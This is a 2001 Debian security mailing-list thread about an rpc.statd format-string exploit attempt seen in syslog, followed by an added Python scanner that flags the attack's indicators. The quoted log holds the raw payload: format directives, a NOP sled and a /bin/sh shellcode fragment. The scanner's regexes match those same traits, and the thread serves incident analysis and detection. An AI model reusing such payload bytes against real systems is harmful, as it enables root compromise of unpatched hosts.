
Re: was I cracked? (rpc.statd, new version)



   Thanks for this explanation.  I got hit with the exact same
   exploit this evening.  I compared my entire /etc structure to
   a known good one from almost a month ago and everything checks
   out.  I'm taking your advice and shutting down this service
   when not using it until I can secure it properly.
   
   thanks,
   jc

Thusly Thwacked By Jeremy Gaddis:
> Someone attempted to run the rpc.statd buffer overflow on
> you, but it appears to have failed.  The reason you see
> "/bin/sh" in the log entry is because that's part of the
> shellcode of the exploit.  The exploit, when successful,
> executes /bin/sh on your machine and leaves the attacker
> sitting at a root shell prompt.
> 
> As someone else stated, disable the rpc.* services if you
> don't need them.  If you do, they should be firewalled off
> and only accept packets from machines they need to "converse"
> with.
> 
> j.
> 
> --
> Jeremy L. Gaddis     <jlgaddis@blueriver.net>
> 
> -----Original Message-----
> From: Lukas Eppler [mailto:lukas.eppler@tempobrain.com]
> Sent: Wednesday, July 11, 2001 5:42 AM
> To: debian-security@lists.debian.org
> Subject: was I cracked? (rpc.statd, new version)
> 
> 
> I have the following entries in /var/log/messages:
> 
> Jul  9 01:21:03 blue -- MARK --
> Jul  9 01:21:11 blue
> Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z
> <F7><FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x
> %n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220
> Jul  9 01:21:11 blue
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>
> \200<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul  9 01:41:03 blue -- MARK --
> 
> I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known exploit fixed. I can't find modified binaries or any strange
> behaviour... was this a defeated attack? The second line says /bin/sh
> somewhere which makes me a bit concerned... Was I cracked?
> 
> Lukas
> 


-- 

Jeff Coppock		Nortel Networks
Systems Engineer	http://nortelnetworks.com
Major Accts.		Santa Clara, CA
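As an added example for this thread (not code from any of the posters), here is a small Python scanner that does what Jeremy did by eye: it regroups the multi-line rpc.statd syslog record and flags the indicators that the quoted log entry exposes, namely a "gethostbyname error for" argument that is not a hostname, runs of octal-escaped 0x90 bytes, stacked %x and %n format directives, and a "/bin/sh" string broken up by stray bytes. The sample lines are constructed and abbreviated from the excerpt above, not the real log; the indicator names, the 16-byte NOP-run threshold and the two-indicator reporting cutoff are my own choices.

```python
"""Scan syslog lines for rpc.statd entries carrying the hallmarks of the
payload quoted in the thread.  Added example; sample lines are constructed."""
import re

# Constructed sample, modelled on (and shortened from) the thread's excerpt.
# syslog prints non-printable bytes as <XX> / ^X / \ooo, which is what we match.
SAMPLE_LOG = [
    "Jul  9 01:21:03 blue -- MARK --",
    "Jul  9 01:21:11 blue",
    "Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for",
    "^X<F7><FF><BF>^X<F7><FF><BF>%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n" + "\\220" * 20,
    "Jul  9 01:21:11 blue",
    "<C7>^F/bin<C7>F^D/shA0<C0>\\210F^G",
    "Jul  9 01:41:03 blue -- MARK --",
    "Jul  9 02:05:40 blue /sbin/rpc.statd[166]: gethostbyname error for fileserver.example.invalid",
    "Jul  9 02:10:02 blue sshd[412]: Accepted publickey for jc from 192.0.2.10 port 40112",
]

# "Mon DD hh:mm:ss host" followed by a space or end of line.
HEADER = re.compile(r"^[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d \S+(?: |$)")
# "prog[pid]: message" (pid optional).
TAGGED = re.compile(r"^(?P<tag>[^\s\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
# What a real NSM peer should have sent: a syntactically valid hostname.
HOSTNAME = re.compile(r"^[A-Za-z0-9.-]{1,253}$")

INDICATORS = {
    "nop_sled": re.compile(r"(?:\\220){16,}"),             # run of octal-escaped 0x90
    "fmt_write": re.compile(r"%\d*n"),                     # %n / %<width>n write directives
    "fmt_leak": re.compile(r"(?:%\d*x){4,}"),              # stacked %x stack reads
    "shell_path": re.compile(r"/bin.{0,8}/sh"),            # '/bin/sh' split by stray bytes
    "high_bytes": re.compile(r"(?:<[89A-F][0-9A-F]>){3,}"),  # runs of non-ASCII bytes
}


def group_records(lines):
    """Regroup syslog lines into records.  A line with a header and a
    'prog[pid]: ' tag (or the '-- MARK --' marker) starts a record; any other
    line, including the bare 'timestamp host' line syslog emits when the logged
    string itself contained a newline, is appended to the preceding record."""
    records = []
    for line in lines:
        m = HEADER.match(line)
        if m:
            rest = line[m.end():]
            t = TAGGED.match(rest)
            if t:
                records.append({"tag": t.group("tag"), "pid": t.group("pid"), "msg": t.group("msg")})
                continue
            if rest.strip() == "-- MARK --":
                records.append({"tag": None, "pid": None, "msg": rest.strip()})
                continue
        else:
            rest = line
        if records:
            records[-1]["msg"] += "\n" + rest
        else:
            records.append({"tag": None, "pid": None, "msg": rest})
    return records


def statd_bad_hostname(record):
    """True for an rpc.statd 'gethostbyname error for <name>' record whose
    <name> is not a valid hostname, i.e. is attacker-controlled data."""
    if not record["tag"] or not record["tag"].endswith("rpc.statd"):
        return False
    m = re.search(r"gethostbyname error for\s*(.*)", record["msg"], re.S)
    if not m:
        return False
    name = m.group(1).strip()
    return bool(name) and not HOSTNAME.match(name)


def classify(record):
    """Names of the generic payload indicators present in one record."""
    found = [name for name, rx in INDICATORS.items() if rx.search(record["msg"])]
    if statd_bad_hostname(record):
        found.append("bad_hostname")
    return found


def scan(lines, min_indicators=2):
    """Return (tag, indicators) for every record with >= min_indicators hits.
    Requiring two independent indicators keeps a lone odd hostname from paging anyone."""
    hits = []
    for rec in group_records(lines):
        found = classify(rec)
        if len(found) >= min_indicators:
            hits.append((rec["tag"], found))
    return hits


if __name__ == "__main__":
    for tag, found in scan(SAMPLE_LOG):
        print(f"{tag}: {', '.join(found)}")
```

Run against the sample, only the rpc.statd record with the payload is reported; the later, legitimate "gethostbyname error for fileserver.example.invalid" entry and the sshd line stay quiet. The regrouping step matters because syslog splits the logged string at the raw newlines inside it, so a line-at-a-time grep would never see the "/bin/sh" fragment and the format directives in the same record.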


